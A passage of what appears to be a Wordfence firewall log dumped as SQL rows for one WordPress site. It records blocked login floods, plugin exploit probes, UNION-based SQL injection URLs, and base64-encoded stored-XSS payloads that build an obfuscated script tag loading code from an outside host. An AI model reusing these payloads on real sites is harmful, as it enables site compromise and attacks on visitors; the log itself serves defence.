Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7906,1564614282.010096,1564614281.706700,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7907,1564614280.946775,1564614280.635300,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7808,1564591648.584710,1564591648.205000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7908,1564614279.192051,1564614278.824400,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7909,1564614278.137519,1564614277.826500,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7910,1564614277.025739,1564614276.662300,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7911,1564614275.906312,1564614275.533900,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7912,1564614274.861853,1564614274.456200,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7913,1564614273.880403,1564614273.534400,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7809,1564591647.483757,1564591647.016900,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7916,1564614270.543039,1564614270.231000,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7917,1564614269.319802,1564614268.993300,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7918,1564614268.265936,1564614267.968200,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7919,1564614267.287606,1564614266.899600,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7793,1564591579.791112,1564591579.033700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7915,1564614271.619566,1564614271.251700,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(8117,1564715950.792335,1564715950.237300,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpLENIQVIoNDUsMTIwLDUwLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1MSw0NSw4MSw0NSksQ0hBUig0NSwxMjAsNTIsNDUsODEsNDUpLENIQVIoNDUsMTIwLDUzLDQ1LDgxLDQ1KSxDSEFSKDQ1LDEyMCw1NCw0NSw4MSw0NSkgLS0gLyogb3JkZXIgYnkgImFzIC8q\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(7792,1564590864.283738,1564590862.067100,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7815,1564591627.405980,1564591626.917300,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP Live Chat Support <= 8.0.28 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"147\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7791,1564590866.762132,1564590865.483000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8060,1564682634.371382,1564682632.505800,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?action=save&updated=true',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Blog Designer <= 1.8.10 - Unauthenticated Stored Cross-Site Scripting','{\"learningMode\":0,\"failedRules\":\"145\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC9zdHlsZT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+PHN0eWxlPg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7790,1564590869.038613,1564590868.029700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7789,1564590871.513642,1564590870.229100,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7788,1564590874.372920,1564590872.791900,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7787,1564590877.973053,1564590877.389800,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','http://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(8122,1564715937.347644,1564715936.923800,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29+--+%2F%2A+order+by+%22as+%2F%2A',NULL,'Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tyZWRpcmVjdF90b10=\",\"paramValue\":\"aHR0cHM6Ly9jb21wYW55cmVnaXN0cmF0aW9uLm9ubGluZS9hbm51YWwtcmV0dXJucy8xMTExMTExMTExMTExIiBVTklPTiBTRUxFQ1QgQ0hBUig0NSwxMjAsNDksNDUsODEsNDUpIC0tIC8qIG9yZGVyIGJ5ICJhcyAvKg==\",\"path\":\"L3dwLWxvZ2luLnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8064,1564682620.484744,1564682618.731900,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W290d19wY3RsX2N1c3RvbV9jc3Nd\",\"paramValue\":\"PC90ZXh0YXJlYT48c2NyaXB0ICBhc3luYz10cnVlIHR5cGU9dGV4dC9qYXZhc2NyaXB0IGxhbmd1YWdlPWphdmFzY3JpcHQ+dmFyIG50ID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5OCwxMDEsMTE0LDExNiw1NCk7dmFyIG1iID0gU3RyaW5nLmZyb21DaGFyQ29kZSg5NywgMTA2LCA5NywgMTIwLCA2NywgMTExLCAxMTcsIDExMCwgMTE2LCAxMDEsIDExNCk7dmFyIHNiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBqYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTA0LCAxMTYsIDExNiwgMTEyLCAxMTUsIDU4LCA0NywgNDcpOyB2YXIgdGIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDExNiwgMTAxLCAxMjAsIDExNiwgNDcsIDEwNiwgOTcsIDExOCwgOTcsIDExNSwgOTksIDExNCwgMTA1LCAxMTIsIDExNik7dmFyIGxiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMDMsOTcsOTgsMTE0LDEwNSwxMDEsMTA4LDEwOCw5NywxMDgsMTExLDExOCwxMDEsOTksOTcsMTE2LDExNSw0Niw5OSwxMTEsMTA5LDQ3LDEwOCwxMTEsMTEwLDEwMSw0NiwxMDYsMTE1LDYzLDEyMiwxMTEsMTEwLDEwMSwxMDUsMTAwLDYxLDU2LDU3LDU0LDUzLDUyLDUxLDUwLDM4LDExNywxMTYsMTA5LDk1LDk5LDYxLDUyLDM4LDEwOSwxMTQsMTExLDYxKTt2YXIgYz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KHNiKTtjLnR5cGU9dGIsYy5hc3luYz0xLGMuc3JjPWpiK2xiK250O3ZhciBuPWRvY3VtZW50LmdldEVsZW1lbnRzQnlUYWdOYW1lKHNiKVswXTtuLnBhcmVudE5vZGUuaW5zZXJ0QmVmb3JlKGMsbik7PC9zY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7822,1564591602.700483,1564591602.225000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php?action=update_zb_fbc_code',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site Scripting','{\"learningMode\":0,\"failedRules\":\"9\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2RvbWFpbl0=\",\"paramValue\":\"PC9zY3JpcHQ+PHNjcmlwdCAgYXN5bmM9dHJ1ZSB0eXBlPXRleHQvamF2YXNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PnZhciBudCA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTgsMTAxLDExNCwxMTYsNTQpO3ZhciBtYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoOTcsIDEwNiwgOTcsIDEyMCwgNjcsIDExMSwgMTE3LCAxMTAsIDExNiwgMTAxLCAxMTQpO3ZhciBzYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTE1LCA5OSwgMTE0LCAxMDUsIDExMiwgMTE2KTt2YXIgamIgPSBTdHJpbmcuZnJvbUNoYXJDb2RlKDEwNCwgMTE2LCAxMTYsIDExMiwgMTE1LCA1OCwgNDcsIDQ3KTsgdmFyIHRiID0gU3RyaW5nLmZyb21DaGFyQ29kZSgxMTYsIDEwMSwgMTIwLCAxMTYsIDQ3LCAxMDYsIDk3LCAxMTgsIDk3LCAxMTUsIDk5LCAxMTQsIDEwNSwgMTEyLCAxMTYpO3ZhciBsYiA9IFN0cmluZy5mcm9tQ2hhckNvZGUoMTAzLDk3LDk4LDExNCwxMDUsMTAxLDEwOCwxMDgsOTcsMTA4LDExMSwxMTgsMTAxLDk5LDk3LDExNiwxMTUsNDYsOTksMTExLDEwOSw0NywxMDgsMTExLDExMCwxMDEsNDYsMTA2LDExNSw2MywxMjIsMTExLDExMCwxMDEsMTA1LDEwMCw2MSw1Niw1Nyw1NCw1Myw1Miw1MSw1MCwzOCwxMTcsMTE2LDEwOSw5NSw5OSw2MSw1MiwzOCwxMDksMTE0LDExMSw2MSk7dmFyIGM9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudChzYik7Yy50eXBlPXRiLGMuYXN5bmM9MSxjLnNyYz1qYitsYitudDt2YXIgbj1kb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZShzYilbMF07bi5wYXJlbnROb2RlLmluc2VydEJlZm9yZShjLG4pOzwvc2NyaXB0PjxzY3JpcHQ+\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"xss\",\"ssl\":1}'),(7823,1564591601.487899,1564591600.958600,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','XSS: Cross Site 